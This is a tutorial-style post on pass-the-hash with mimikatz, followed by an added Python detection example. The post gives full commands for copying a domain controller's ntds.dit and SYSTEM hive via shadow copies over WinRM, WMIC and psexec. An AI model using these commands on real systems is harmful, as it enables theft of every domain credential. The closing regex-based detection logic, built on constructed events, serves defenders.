Use Pass-the-Hash to exfil ntds.dit

If you have a hash for either a domain admin or a local admin on a domain controller, you can use mimikatz to exfil the entire Active Directory database.

From mimikatz, run the following command to spawn a shell as the target user:

sekurlsa::pth /user:<username> /domain:<domainname> /ntlm:<hash> /run:cmd.exe

Now you have a few options from the new cmd window. For example:

Using PowerShell

winrm set winrm/config/client '@{TrustedHosts="<computer_name>"}'

Enter-PSSession -ComputerName <computer_name>

vssadmin create shadow /for=c:

mkdir c:\1

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyX\windows\ntds\ntds.dit c:\1

reg save hklm\system c:\1

(HarddiskVolumeShadowCopyX is the shadow copy created by vssadmin; X is the number vssadmin reports when the shadow copy is created.)

Using wmic

WMIC /node:"<computer_name>" process call create "cmd.exe /c vssadmin create shadow /for=c:"

WMIC /node:"<computer_name>" process call create "cmd.exe /c mkdir c:\1"

WMIC /node:"<computer_name>" process call create "cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyX\windows\ntds\ntds.dit c:\1"

WMIC /node:"<computer_name>" process call create "cmd.exe /c reg save hklm\system c:\1"

Using psexec

psexec \\<computer_name> vssadmin create shadow /for=c:

psexec \\<computer_name> cmd /c mkdir c:\1

psexec \\<computer_name> cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyX\windows\ntds\ntds.dit c:\1

psexec \\<computer_name> cmd /c reg save hklm\system c:\1

Access the C$ share on the remote machine, retrieve the file and delete the staging folder.
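From the defender's side, the three commands above (shadow copy creation, a copy of ntds.dit out of the shadow volume, and a save of the SYSTEM hive) form a recognisable chain in process-creation telemetry. The following detection logic is an added example, not part of the original post; the event records, field names, hostnames and timestamps are constructed for the example and stand in for Windows 4688 / Sysmon ID 1 data.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation records (not real telemetry). Field names are assumptions.
SAMPLE_EVENTS = [
    {"ts": "2024-01-05T10:00:01", "host": "DC01", "cmd": "vssadmin create shadow /for=c:"},
    {"ts": "2024-01-05T10:00:09", "host": "DC01", "cmd": r"cmd.exe /c mkdir c:\1"},
    {"ts": "2024-01-05T10:00:15", "host": "DC01",
     "cmd": r"cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\windows\ntds\ntds.dit c:\1"},
    {"ts": "2024-01-05T10:00:20", "host": "DC01", "cmd": r"reg save hklm\system c:\1"},
    # A lone shadow copy on a file server (e.g. a backup job) should stay low severity.
    {"ts": "2024-01-05T11:30:00", "host": "FS02", "cmd": "vssadmin create shadow /for=c:"},
]

# One rule per stage of the chain; each is a case-insensitive regex over the command line.
RULES = [
    ("vss_create",  re.compile(r"vssadmin(\.exe)?\s+create\s+shadow", re.I)),
    ("ntds_copy",   re.compile(r"HarddiskVolumeShadowCopy\d+\\.*ntds\.dit", re.I)),
    ("system_hive", re.compile(r"reg(\.exe)?\s+save\s+hklm\\system", re.I)),
]

def match_rules(cmd):
    """Return the names of every stage rule that matches this command line."""
    return [name for name, rx in RULES if rx.search(cmd)]

def detect_ntds_dump(events, window=timedelta(minutes=10)):
    """Group stage hits per host; 'high' only when all three stages occur within the window."""
    per_host = {}
    for ev in events:
        hits = match_rules(ev["cmd"])
        if not hits:
            continue
        per_host.setdefault(ev["host"], []).append((datetime.fromisoformat(ev["ts"]), hits))
    findings = {}
    for host, seen in per_host.items():
        seen.sort()
        first = seen[0][0]
        stages = {h for ts, hits in seen if ts - first <= window for h in hits}
        level = "high" if {"vss_create", "ntds_copy", "system_hive"} <= stages else "low"
        findings[host] = {"stages": sorted(stages), "level": level}
    return findings

if __name__ == "__main__":
    for host, finding in detect_ntds_dump(SAMPLE_EVENTS).items():
        print(host, finding)
```

In a real pipeline the same rules would also be fed by WMI and PsExec service-creation events, since those launch the identical command lines on the domain controller.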